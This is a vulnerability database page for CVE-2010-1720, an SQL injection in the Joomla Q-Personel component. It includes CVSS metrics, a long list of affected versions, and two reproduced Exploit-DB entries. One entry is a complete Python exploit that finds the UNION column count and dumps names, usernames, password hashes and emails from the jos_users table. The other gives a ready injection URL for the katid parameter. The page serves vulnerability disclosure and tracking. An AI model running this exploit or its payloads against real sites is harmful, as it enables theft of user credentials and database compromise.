CVE-2010-1720 Detail

CVE-2010-1720

CVE Descriptions

SQL injection vulnerability in the Q-Personel (com_qpersonel) component 1.0.2 and earlier for Joomla! allows remote attackers to execute arbitrary SQL commands via the katid parameter in a qpListele action to index.php.

CVE Informations

Related Weaknesses

CWE-ID	Weakness Name	Source
CWE-89	Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') The product constructs all or part of an SQL command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended SQL command when it is sent to a downstream component. Without sufficient removal or quoting of SQL syntax in user-controllable inputs, the generated SQL query can cause those inputs to be interpreted as SQL instead of ordinary user data.

Metrics

Metrics	Score	Severity	CVSS Vector	Source
V2	7.5		AV:N/AC:L/Au:N/C:P/I:P/A:P	nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

EPSS First.org

Exploit information

Exploit Database EDB-ID : 12723

Publication date : 2010-05-23 22h00 +00:00
Author : Valentin Hoebel
EDB Verified : Yes

#!/usr/bin/python # Joomla com_qpersonel SQL Injection Remote Exploit # Version 1.0 (23th May 2010 (public release) # By Valentin Hoebel (valentin@xenuser.org) # ASCII FOR BREAKFAST # # EXPLOIT BASED ON MY COLUMN FUZZER # Fuzzer was enhanced so it serves as a Joomla Exploiter template # # About the Vulnerability: # ------------------------------------------------------------------------ # http://www.xenuser.org/documents/security/qpersonel_sql.txt # # About the Exploit: # ------------------------------------------------------------------------ # Exploits the SQL injection vulnerability I discovered # on 13th April 2010. # # Copy, modify, distribute and share the code as you like! # Warning: I am not responsible for any damage you might cause! # Exploit written for educational purposes only. import sys, re, urllib, urllib2, string from urllib2 import Request, urlopen, URLError, HTTPError # Define the max. amounts for trying max_columns = 100 # Prints usage def print_usage(): print "" print "=================================================================================" print " Joomla com_qpersonel SQL Injection Remote Exploit" print " by Valentin Hoebel (valentin@xenuser.org)" print "" print " Vulnerable URL example:" print " http://target/index.php?option=com_qpersonel&task=qpListele&katid=1" print "" print " Usage:" print " -u <URL> (e.g. -u \"http://target/index.php?option=com_qpersonel&task=qpListele&katid=1\")" print " --help (displays this text)" print "" print " Read the source code if you want to know more about this vulnerability." print " For educational purposes only! I am not responsible if you cause any damage!" print "" print "=================================================================================" print "" print "" return #Prints banner def print_banner(): print "" print "=================================================================================" print "" print " Joomla com_qpersonel SQL Injection Remote Exploit" print " by Valentin Hoebel (valentin@xenuser.org)" print "" print " For educational purposes only! I am not responsible if you cause any damage!" print "" print "=================================================================================" print "" return # Testing if URL is reachable, with error handling def test_url(): print ">> Checking if connection can be established..." try: response = urllib2.urlopen(provided_url) except HTTPError, e: print ">> The connection could not be established." print ">> Error code: ", e.code print ">> Exiting now!" print "" sys.exit(1) except URLError, e: print ">> The connection could not be established." print ">> Reason: ", e.reason print ">> Exiting now!" print "" sys.exit(1) else: valid_target = 1 print ">> Connected to target! URL seems to be valid." print "" return # Find correct amount of columns for the SQL Injection and enhance with Joomla exploitation capabilities def find_columns(): # Define some important variables and make the script a little bit dynamic number_of_columns = 1 column_finder_url_string = "+AND+1=2+UNION+SELECT+" column_finder_url_message = "0x503077337220743020743368206330777321" column_finder_url_message_plain = "P0w3r t0 t3h c0ws!" column_finder_url_terminator = "+from+jos_users--" next_column = "," column_finder_url_sample = "group_concat(0x503077337220743020743368206330777321,name,username,password,email,usertype,0x503077337220743020743368206330777321)" # Craft the final URL to check final_check_url = provided_url+column_finder_url_string+column_finder_url_message print ">> Trying to find the correct number of columns..." for x in xrange(1, max_columns): # Visit website and store response source code of site final_check_url2 = final_check_url+column_finder_url_terminator response = urllib2.urlopen(final_check_url2) html = response.read() find_our_injected_string = re.findall(column_finder_url_message_plain, html) # When the correct amount was found we display the information and exit if len(find_our_injected_string) != 0: print ">> Correct number of columns found!" print ">> Amount: ", number_of_columns # Craft our exploit query malicious_query = string.replace(final_check_url2, column_finder_url_message, column_finder_url_sample) print "" print ">> Trying to fetch the first user of the Joomla user table..." # Receive the first user of the Joomla user table response = urllib2.urlopen(malicious_query) html = response.read() get_secret_data = string.find(html, "P0w3r t0 t3h c0ws!") get_secret_data += 18 new_html = html[get_secret_data :] new_get_secret_data = string.find(new_html, "P0w3r t0 t3h c0ws!") new_html_2 = new_html[:new_get_secret_data] print "name, username, password, e-mail address and user status are shown" print new_html_2 print "" # Offer to display all entries of the Joomla user table user_reply = str(raw_input(">> Do you want to display all Joomla users? Replying with Yes will show you the source code response of the website. (Yes/No) ")) if user_reply == "Y" or user_reply == "y" or user_reply == "Yes" or user_reply == "yes": print "" print "-------------------------------------------------------------" print new_html print "-------------------------------------------------------------" print "The seperator for the single entries is: ", column_finder_url_message_plain print "Bye!" print "" print "" sys.exit(1) else: print "Bye!" print "" print "" sys.exit(1) # Increment counter var by one number_of_columns += 1 #Add a new column to the URL final_check_url += next_column final_check_url += column_finder_url_message # If fuzzing is not successfull print this message print ">> Fuzzing was not successfull. Maybe the target is not vulnerable?" print "Bye!" print "" print "" # Checking if argument was provided if len(sys.argv) <=1: print_usage() sys.exit(1) for arg in sys.argv: # Checking if help was called if arg == "--help": print_usage() sys.exit(1) # Checking if URL was provided, if yes -> go! if arg == "-u": provided_url = sys.argv[2] print_banner() # At first we test if we can actually reach the provided URL test_url() # Now start with finding the correct amount of columns find_columns() ### EOF ###

Exploit Database EDB-ID : 12200

Publication date : 2010-04-12 22h00 +00:00
Author : Valentin
EDB Verified : Yes

# Exploit Title: Joomla Component QPersonel SQL Injection Vulnerability # Date: 13.04.2010 # Author: Valentin # Category: webapps/0day # Version: XSS security fix from 31.12.2009, 1.02 and before # Tested on: Debian Lenny, MySQL 5 # CVE : # Code : [:::::::::::::::::::::::::::::::::::::: 0x1 ::::::::::::::::::::::::::::::::::::::] |:: >> General Information |:: Advisory/Exploit Title = Joomla Component QPersonel SQL Injection Vulnerability |:: By = Valentin Hoebel |:: Contact = valentin@xenuser.org |:: |:: [:::::::::::::::::::::::::::::::::::::: 0x2 ::::::::::::::::::::::::::::::::::::::] |:: >> Product information |:: Name = QPersonel |:: Vendor = Q-PROJE |:: Vendor Website = http://www.qproje.com/ |:: Affected Versions = XSS security fix from 31.12.2009, 1.02 and before |:: |:: [:::::::::::::::::::::::::::::::::::::: 0x3 ::::::::::::::::::::::::::::::::::::::] |:: >> #1 Vulnerability |:: Type = SQL Injection |:: Vulnerable File(s) = qpersonel.php |:: Vulnerable Parameter(s) = katid |:: Example URL = index.php?option=com_qpersonel&task=qpListele&katid=XX+AND+1=2+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,concat(database(),user())-- |:: Selected information gets displayed within the title tag. |:: |:: [:::::::::::::::::::::::::::::::::::::: 0x4 ::::::::::::::::::::::::::::::::::::::] |:: >> Additional Information |:: Advisory Published = 13.04.2010 |:: |:: [:::::::::::::::::::::::::::::::::::::: 0x5 ::::::::::::::::::::::::::::::::::::::] |:: >> Misc |:: Greetz && Thanks = inj3ct0r team, Exploit DB, hack0wn and ExpBase! |:: |:: [:::::::::::::::::::::::::::::::::::::: EOF ::::::::::::::::::::::::::::::::::::::]

Products Mentioned

Configuraton 0

Qproje>>Com_qpersonel >> Version To (including) 1.0.2

Joomla>>Joomla\! >> Version *

Joomla>>Joomla\! >> Version - (Open CPE detail)
Joomla>>Joomla\! >> Version 1.0.0 (Open CPE detail)
Joomla>>Joomla\! >> Version 1.0.1 (Open CPE detail)
Joomla>>Joomla\! >> Version 1.0.2 (Open CPE detail)
Joomla>>Joomla\! >> Version 1.0.3 (Open CPE detail)
Joomla>>Joomla\! >> Version 1.0.4 (Open CPE detail)
Joomla>>Joomla\! >> Version 1.0.5 (Open CPE detail)
Joomla>>Joomla\! >> Version 1.0.6 (Open CPE detail)
Joomla>>Joomla\! >> Version 1.0.7 (Open CPE detail)
Joomla>>Joomla\! >> Version 1.0.8 (Open CPE detail)
Joomla>>Joomla\! >> Version 1.0.9 (Open CPE detail)
Joomla>>Joomla\! >> Version 1.0.10 (Open CPE detail)
Joomla>>Joomla\! >> Version 1.0.11 (Open CPE detail)
Joomla>>Joomla\! >> Version 1.0.12 (Open CPE detail)
Joomla>>Joomla\! >> Version 1.0.13 (Open CPE detail)
Joomla>>Joomla\! >> Version 1.0.14 (Open CPE detail)
Joomla>>Joomla\! >> Version 1.0.15 (Open CPE detail)
Joomla>>Joomla\! >> Version 1.5.0 (Open CPE detail)
Joomla>>Joomla\! >> Version 1.5.1 (Open CPE detail)
Joomla>>Joomla\! >> Version 1.5.2 (Open CPE detail)
Joomla>>Joomla\! >> Version 1.5.3 (Open CPE detail)
Joomla>>Joomla\! >> Version 1.5.4 (Open CPE detail)
Joomla>>Joomla\! >> Version 1.5.5 (Open CPE detail)
Joomla>>Joomla\! >> Version 1.5.6 (Open CPE detail)
Joomla>>Joomla\! >> Version 1.5.7 (Open CPE detail)
Joomla>>Joomla\! >> Version 1.5.8 (Open CPE detail)
Joomla>>Joomla\! >> Version 1.5.9 (Open CPE detail)
Joomla>>Joomla\! >> Version 1.5.10 (Open CPE detail)
Joomla>>Joomla\! >> Version 1.5.11 (Open CPE detail)
Joomla>>Joomla\! >> Version 1.5.12 (Open CPE detail)
Joomla>>Joomla\! >> Version 1.5.13 (Open CPE detail)
Joomla>>Joomla\! >> Version 1.5.14 (Open CPE detail)
Joomla>>Joomla\! >> Version 1.5.15 (Open CPE detail)
Joomla>>Joomla\! >> Version 1.5.15 (Open CPE detail)
Joomla>>Joomla\! >> Version 1.5.15 (Open CPE detail)
Joomla>>Joomla\! >> Version 1.5.16 (Open CPE detail)
Joomla>>Joomla\! >> Version 1.5.17 (Open CPE detail)
Joomla>>Joomla\! >> Version 1.5.18 (Open CPE detail)
Joomla>>Joomla\! >> Version 1.5.19 (Open CPE detail)
Joomla>>Joomla\! >> Version 1.5.20 (Open CPE detail)
Joomla>>Joomla\! >> Version 1.5.21 (Open CPE detail)
Joomla>>Joomla\! >> Version 1.5.22 (Open CPE detail)
Joomla>>Joomla\! >> Version 1.5.23 (Open CPE detail)
Joomla>>Joomla\! >> Version 1.5.24 (Open CPE detail)
Joomla>>Joomla\! >> Version 1.5.25 (Open CPE detail)
Joomla>>Joomla\! >> Version 1.5.26 (Open CPE detail)
Joomla>>Joomla\! >> Version 1.6 (Open CPE detail)
Joomla>>Joomla\! >> Version 1.6 (Open CPE detail)
Joomla>>Joomla\! >> Version 1.6 (Open CPE detail)
Joomla>>Joomla\! >> Version 1.6 (Open CPE detail)
Joomla>>Joomla\! >> Version 1.6 (Open CPE detail)
Joomla>>Joomla\! >> Version 1.6 (Open CPE detail)
Joomla>>Joomla\! >> Version 1.6 (Open CPE detail)
Joomla>>Joomla\! >> Version 1.6 (Open CPE detail)
Joomla>>Joomla\! >> Version 1.6 (Open CPE detail)
Joomla>>Joomla\! >> Version 1.6 (Open CPE detail)
Joomla>>Joomla\! >> Version 1.6 (Open CPE detail)
Joomla>>Joomla\! >> Version 1.6 (Open CPE detail)
Joomla>>Joomla\! >> Version 1.6 (Open CPE detail)
Joomla>>Joomla\! >> Version 1.6 (Open CPE detail)
Joomla>>Joomla\! >> Version 1.6 (Open CPE detail)
Joomla>>Joomla\! >> Version 1.6 (Open CPE detail)
Joomla>>Joomla\! >> Version 1.6 (Open CPE detail)
Joomla>>Joomla\! >> Version 1.6 (Open CPE detail)
Joomla>>Joomla\! >> Version 1.6.0 (Open CPE detail)
Joomla>>Joomla\! >> Version 1.6.1 (Open CPE detail)
Joomla>>Joomla\! >> Version 1.6.2 (Open CPE detail)
Joomla>>Joomla\! >> Version 1.6.3 (Open CPE detail)
Joomla>>Joomla\! >> Version 1.6.4 (Open CPE detail)
Joomla>>Joomla\! >> Version 1.6.5 (Open CPE detail)
Joomla>>Joomla\! >> Version 1.6.6 (Open CPE detail)
Joomla>>Joomla\! >> Version 1.7.0 (Open CPE detail)
Joomla>>Joomla\! >> Version 1.7.1 (Open CPE detail)
Joomla>>Joomla\! >> Version 1.7.2 (Open CPE detail)
Joomla>>Joomla\! >> Version 1.7.3 (Open CPE detail)
Joomla>>Joomla\! >> Version 1.7.4 (Open CPE detail)
Joomla>>Joomla\! >> Version 1.7.5 (Open CPE detail)
Joomla>>Joomla\! >> Version 2.5.0 (Open CPE detail)
Joomla>>Joomla\! >> Version 2.5.0 (Open CPE detail)
Joomla>>Joomla\! >> Version 2.5.0 (Open CPE detail)
Joomla>>Joomla\! >> Version 2.5.0 (Open CPE detail)
Joomla>>Joomla\! >> Version 2.5.0 (Open CPE detail)
Joomla>>Joomla\! >> Version 2.5.1 (Open CPE detail)
Joomla>>Joomla\! >> Version 2.5.2 (Open CPE detail)
Joomla>>Joomla\! >> Version 2.5.3 (Open CPE detail)
Joomla>>Joomla\! >> Version 2.5.4 (Open CPE detail)
Joomla>>Joomla\! >> Version 2.5.5 (Open CPE detail)
Joomla>>Joomla\! >> Version 2.5.6 (Open CPE detail)
Joomla>>Joomla\! >> Version 2.5.7 (Open CPE detail)
Joomla>>Joomla\! >> Version 2.5.8 (Open CPE detail)
Joomla>>Joomla\! >> Version 2.5.9 (Open CPE detail)
Joomla>>Joomla\! >> Version 2.5.10 (Open CPE detail)
Joomla>>Joomla\! >> Version 2.5.11 (Open CPE detail)
Joomla>>Joomla\! >> Version 2.5.12 (Open CPE detail)
Joomla>>Joomla\! >> Version 2.5.13 (Open CPE detail)
Joomla>>Joomla\! >> Version 2.5.14 (Open CPE detail)
Joomla>>Joomla\! >> Version 2.5.15 (Open CPE detail)
Joomla>>Joomla\! >> Version 2.5.16 (Open CPE detail)
Joomla>>Joomla\! >> Version 2.5.17 (Open CPE detail)
Joomla>>Joomla\! >> Version 2.5.17 (Open CPE detail)
Joomla>>Joomla\! >> Version 2.5.17 (Open CPE detail)
Joomla>>Joomla\! >> Version 2.5.18 (Open CPE detail)
Joomla>>Joomla\! >> Version 2.5.18 (Open CPE detail)
Joomla>>Joomla\! >> Version 2.5.18 (Open CPE detail)
Joomla>>Joomla\! >> Version 2.5.19 (Open CPE detail)
Joomla>>Joomla\! >> Version 2.5.20 (Open CPE detail)
Joomla>>Joomla\! >> Version 2.5.21 (Open CPE detail)
Joomla>>Joomla\! >> Version 2.5.21 (Open CPE detail)
Joomla>>Joomla\! >> Version 2.5.21 (Open CPE detail)
Joomla>>Joomla\! >> Version 2.5.22 (Open CPE detail)
Joomla>>Joomla\! >> Version 2.5.23 (Open CPE detail)
Joomla>>Joomla\! >> Version 2.5.23 (Open CPE detail)
Joomla>>Joomla\! >> Version 2.5.23 (Open CPE detail)
Joomla>>Joomla\! >> Version 2.5.24 (Open CPE detail)
Joomla>>Joomla\! >> Version 2.5.25 (Open CPE detail)
Joomla>>Joomla\! >> Version 2.5.26 (Open CPE detail)
Joomla>>Joomla\! >> Version 2.5.27 (Open CPE detail)
Joomla>>Joomla\! >> Version 2.5.28 (Open CPE detail)
Joomla>>Joomla\! >> Version 2.5.28 (Open CPE detail)
Joomla>>Joomla\! >> Version 2.5.28 (Open CPE detail)
Joomla>>Joomla\! >> Version 2.5.28 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.0.0 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.0.0 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.0.0 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.0.0 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.0.0 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.0.1 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.0.2 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.0.3 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.0.4 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.1.0 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.1.0 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.1.0 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.1.0 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.1.0 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.1.0 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.1.0 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.1.1 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.1.2 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.1.3 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.1.4 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.1.5 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.1.6 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.2.0 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.2.0 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.2.0 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.2.0 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.2.0 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.2.0 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.2.1 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.2.1 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.2.1 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.2.2 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.2.2 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.2.2 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.2.3 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.2.4 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.2.5 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.2.6 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.2.7 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.3.0 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.3.0 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.3.0 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.3.0 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.3.0 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.3.0 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.3.1 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.3.1 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.3.1 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.3.2 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.3.2 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.3.2 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.3.3 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.3.4 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.3.5 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.3.6 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.4.0 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.4.0 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.4.0 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.4.0 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.4.0 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.4.0 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.4.0 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.4.0 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.4.1 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.4.1 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.4.1 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.4.1 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.4.1 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.4.2 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.4.2 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.4.2 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.4.3 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.4.4 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.4.4 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.4.4 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.4.4 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.4.5 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.4.6 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.4.7 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.4.8 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.4.8 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.4.8 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.5.0 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.5.0 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.5.0 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.5.0 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.5.0 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.5.0 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.5.0 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.5.0 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.5.0 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.5.0 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.5.0 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.5.1 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.5.1 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.5.1 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.5.1 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.6.0 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.6.0 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.6.0 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.6.0 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.6.0 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.6.0 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.6.0 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.6.1 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.6.1 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.6.1 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.6.1 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.6.2 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.6.3 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.6.3 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.6.3 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.6.3 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.6.3 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.6.4 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.6.5 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.7.0 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.7.0 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.7.0 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.7.0 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.7.0 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.7.0 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.7.0 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.7.0 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.7.0 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.7.0 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.7.0 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.7.0 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.7.1 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.7.1 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.7.1 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.7.1 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.7.2 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.7.3 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.7.3 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.7.3 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.7.3 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.7.3 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.7.4 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.7.4 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.7.4 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.7.4 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.7.5 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.8.0 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.8.0 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.8.0 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.8.0 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.8.0 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.8.0 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.8.1 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.8.1 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.8.1 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.8.2 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.8.2 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.8.2 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.8.3 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.8.3 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.8.3 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.8.4 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.8.4 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.8.4 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.8.4 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.8.5 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.8.5 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.8.5 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.8.6 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.8.6 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.8.6 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.8.7 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.8.7 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.8.7 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.8.8 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.8.8 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.8.8 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.8.9 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.8.9 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.8.9 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.8.10 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.8.11 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.8.11 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.8.11 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.8.12 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.8.12 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.8.12 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.8.13 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.9.0 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.9.0 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.9.0 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.9.0 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.9.0 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.9.0 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.9.0 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.9.0 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.9.1 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.9.1 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.9.2 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.9.2 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.9.3 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.9.3 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.9.4 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.9.4 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.9.4 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.9.5 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.9.5 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.9.6 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.9.6 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.9.6 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.9.7 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.9.7 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.9.7 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.9.8 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.9.9 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.9.10 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.9.11 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.9.12 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.9.13 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.9.14 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.9.15 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.9.16 (Open CPE detail)
